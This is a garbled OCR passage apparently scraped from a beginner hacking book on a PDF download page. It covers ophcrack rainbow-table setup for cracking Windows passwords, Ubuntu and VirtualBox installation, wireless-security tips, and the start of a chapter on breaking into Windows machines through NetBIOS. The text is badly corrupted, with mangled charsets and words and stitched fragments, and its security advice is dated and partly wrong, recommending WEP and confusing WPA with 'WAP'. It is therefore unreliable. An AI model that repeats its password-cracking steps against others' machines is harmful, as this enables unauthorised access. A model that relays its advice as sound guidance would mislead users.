94. tuywx yZz46CDEFGHUKLMNOPORS TUR ye lt le including the space character lt XP german 7 4GB formerly Known as german Success rate 99 Only for passwords that contains at least one german character a 0A0UR Charset 0123456 o9abcdetghykimnopgrstuywsyzZz46CDEFGHUKLMNOPORS TU WAY A SB I lt gt Pie fe aggA0Ur 86 3 Vista free 461MB Success rate 99 Charset based on a dictionary with variations hybrid mode mdosum 403ctoe1 fod 27 2a40019b47 cadbzebb Vista special 8 0GB formerly Known as NTHASH Success rate 99 Passwords of length 6 or less Charset 0123456 o9abcdetghklmnoparstuywsx yz46CDEF GHIKLMNOPORS TLIMA Z Abe i gt ee ke including the space character Passwords of length Charset 01234567 09abcdefghijklmnopgrstuvwy ABCDEF GHIJELMNOP ORS TUMA Z Passwords of length 8 Charset 01234567 09abcdefghijklmnopgrstuvwxyz 4 Inthe example chose the largest possible free table Next run ophcrack and click on tables Select the table you downloaded and click Install to locate the file on your computer Hit OK to continue Table Selection Table Directory Status XP Free Fast CHDownloads Rainbow Tables P on disk F free small not installed XP special not installed XP german v1 not installed F german v2 not installed Vista special not installed vista free not installed enabled disabled not installed awe 87 5 Next
95. u can use the Live CD version to install Wubi if you followed the steps above and downloaded it Or you can download the full 5 gigabyte version from http wubi installer org 1 If you downloaded the full 5 gigabyte file double click it to run it If you are using the previously downloaded Live CD version then insert your Ubuntu Live CD A Ubuntu CD menu should come up 20 Ubuntu CD Menu Demo and Full installation Try Ubuntu without installing Simply reboot your machine with the CD in the tray You may perform a Full installation From within the demo to install Ubuntu either alongside Windows or as the only operating system Install inside Windows Install and uninstall Ubuntu like arty other application without the need for a dedicated partition You will be able to boot into either Windows or Ubuntu Hibernation is not enabled in this mode and disk performance is slightly reduced Learn more Ubuntu is a Free community developed linux based operating system complete with a web browser productivity software instant messaging and much more Cancel 2 Choose Install inside Windows 3 In the next window choose the appropriate options and click install Ubuntu setup qs You are about to install Ubuntu 8 04 1 Please select username and password For the new account Installation Drive 69 GB free ia Language i a i z em C English Installation Size GB Username A amp
96. u choose to download lots of programs it won t be a problem If you have limited drive space you should go with a fixed size image so that you don t have to worry about going over too much S Create New Virtual Disk Virtual Disk Image Type Select the type of virtual hard disk image you want to create dynamically expanding image initially occupies a very small amount of space on your physical hard disk IE will grow dynamically up bo the size specified as the Guest O5 claims disk space A fimed size image does not grow It is stored in a File of approximately the same size as the size of the virtual hard disk The creation of a fixed size image may take a long time depending on the image size and the write performance of vour harddisk Image Type Dynamically expanding image Fixed size image 25 9 Choose the amount of gigabytes you would like to dedicate to running Linux would go with 2 GB at the least T Create New Virtual Disk Virtual Disk Location and Size Press the Select button to select the location and name of the File to store the virtual hard disk image or type a file name in the entry Field Image File Name Select the size of the virtual hard disk image in megabytes This size will be reported to the Guest 05 as the size of the virtual hard disk Image Size 10 Simply hit Finish T Create New Virtual Disk You are going to create a ne
97. virtual machine for VirtualBox Use the Next button bo go the next page of the wizard and the Back button to return to the previous page 23 5 Name it and choose Ubuntu from the drop down list i Create New Virtual Machine VM Name and OS Type Enter a name for the new virtual machine and select the type of the quest operating system you plan to install onto the virtual machine The name of the virtual machine usually indicates its software and hardware configuration IE will be used by all VirtualBox components to identify your virtual machine Mame OS Type w w 6 Choose the amount of RAM you would like to dedicate to running Linux Choose about to of your total RAM I have 2 gigs of RAM so chose 512 MB Ni Create New Virtual Machine Select the amount of base memory RAM in megabytes to be allocated to the virtual machine The recommended base memory size is 256 MB Base Memory Size ale 4 ME 3004 ME oe K m 7 Hit Next 24 i Create New Virtual Disk Welcome to the Create New Virtual Disk Wizard This wizard will help you bo create a new virtual hard disk image for your virtual machine Use the Next button to go to the next page of the wizard and he Back button to return to the previous page Here we choose whether we would like to create a dynamic or fixed hard disk image If you have lots of space on your hard disk would go with a dynamic image so if yo
98. w wirtual hard disk image with the Following parameters Type Dynamically expanding image Location C Documents and Settings Dawid My VirtualBox VDT L Size 2 00 GB 2147493645 Bytes If the above settings are correct press the Finish button Once you press it a new hard disk image will be created 26 11 It automatically selects the image you just created Hit Next Create New Virtual Machine Virtual Hard Disk Select a hard disk image to be used as the boot hard disk of the virtual machine You can either create a new hard disk using the Mew button or select an existing hard disk image From the drop down list or by pressing the Existing button ito invoke the Virtual Disk Manager dialog TF you need a more complicated hard disk setup you can also skip this step and attach hard disks later using the YM Settings dialog The recommended size of the boot hard disk is 048 MB Boot Hard Disk Primary Master You are going to create a new virtual machine with the Following parameters Mame Ubuntu O5 Type Other Unknown Base Memory S12 ME Boot Hard Disk Ubuntu wdi fc Documents and Settings David Mi VirtualBox s im E IF the above is correct press the Finish button Once you press it a new virtual machine will be created Moke that you can alter these and all other setting of the created virtual machine at any time using the Settings dialog accessible through the menu of Ehe main window 27
99. you could follow to keep your wireless network safe from hackers 1 Change your routers default password and make sure you have WAP encryption enabled If your router doesn t have a WAP option use WEP It is better than nothing Use a long secure password for your router Include numbers lowercase letters uppercase letters and other symbols The more obscure the better Make sure your router has the option to not broadcast your SSID enabled This will prevent some programs like Net Stumbler from locating your wireless network Use MAC filtering on your router Every wireless card and wireless adapter has a MAC address By choosing to allow only your MAC addresses onto the network you can keep a lot of attackers out To prevent packet sniffing attacks from affecting you make sure the important sites you use like banks use SSL Secure Socket Layer encryption You can tell if the site has SSL enabled if the URL begins with https instead of http In caf s or other hotspots where internet is free packet sniffing is very common To avoid being affected use a VPN Virtual Private Network service to encrypt the data you send across the internet 78 Chapter Seven Windows Hacking NetBIOS NetBIOS stands for Network Basic Input Output System It allows your LAN or WAN to share drives folders files and printers Gaining access to a computer through NetBIOS is very simple and easy The only thing requi
Download Pdf Manuals
Related Search